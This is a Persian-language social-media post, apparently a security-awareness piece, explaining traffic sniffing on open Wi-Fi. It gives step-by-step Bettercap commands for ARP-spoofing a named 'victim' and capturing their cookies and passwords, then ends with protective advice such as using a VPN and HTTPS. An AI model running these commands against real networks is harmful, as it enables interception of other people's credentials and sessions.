بزن بریم! تصور کن: تو در یک کافه هستی و به وایفای باز متصل شدهای. ایمیلهایت را باز میکنی، وارد بانک میشوی. فکر میکنی در امان هستی؟ اما هکری در همان کافه در حال «گوش دادن» به ترافیک تو است و هر چیزی که لازم دارد را برمیدارد. این همان اسنیفینگ است! 🚨
🔑 اسنیفینگ چیست؟
اسنیفینگ به معنای رهگیری ترافیک شبکه است. مثل گذاشتن شنود روی تلفن، فقط به جای صدا، دادهها را میگیرد: رمزهای عبور، کوکیها، توکنهای احراز هویت و غیره.
⚙️ چگونه کار میکند؟
اسنیفینگ زمانی ممکن است که:
• شبکه محافظت نشده باشد (وایفای باز)
• رمزگذاری ضعیف استفاده شود (یا اصلاً نباشد)
• ترافیک از یک کانال عبور کند که برای چند دستگاه قابل دسترسی باشد
🛠️ نمونههایی از اسنیفرها:
• Wireshark: قدرتمندترین اسنیفر با گرافیک و فیلترهای پیشرفته
• tcpdump: ابزار خط فرمان برای کار سریع روی سرورها
• Bettercap: اسنیفینگ + حملات نوع MITM (جایگزینی DNS، گرفتن کوکیها و غیره)
🚨 مثال حمله اسنیفینگ (گام به گام):
1. به همان شبکه وایفای که قربانی متصل است وصل میشویم.
2. برنامه Bettercap یا Wireshark را اجرا میکنیم.
3. آدرس IP قربانی را مشخص میکنیم:
net.probe on
net.show
4. رهگیری بستهها را فعال میکنیم:
set arp.spoof.targets <IP-قربانی>
arp.spoof on
net.sniff on
5. لذت ببرید: کوکیها، نامهای کاربری، رمزهای عبور را دریافت میکنیم (اگر ترافیک رمزگذاری نشده باشد).
🛡️ چگونه محافظت کنیم؟
• هرگز بدون VPN از وایفای عمومی وارد نشوید.
• همیشه از HTTPS استفاده کنید.
• افزونههایی مانند HTTPS Everywhere را نصب کنید.
• در شبکههای باز به سرویسهای مهم وارد نشوید.
🔒 با آگاهی و احتیاط، امنیت خود را حفظ کنید!
#اسنیفینگ #امنیت_شبکه #هک #لینوکس #Wireshark #VPN #HTTPS
🚫 @ir_c_a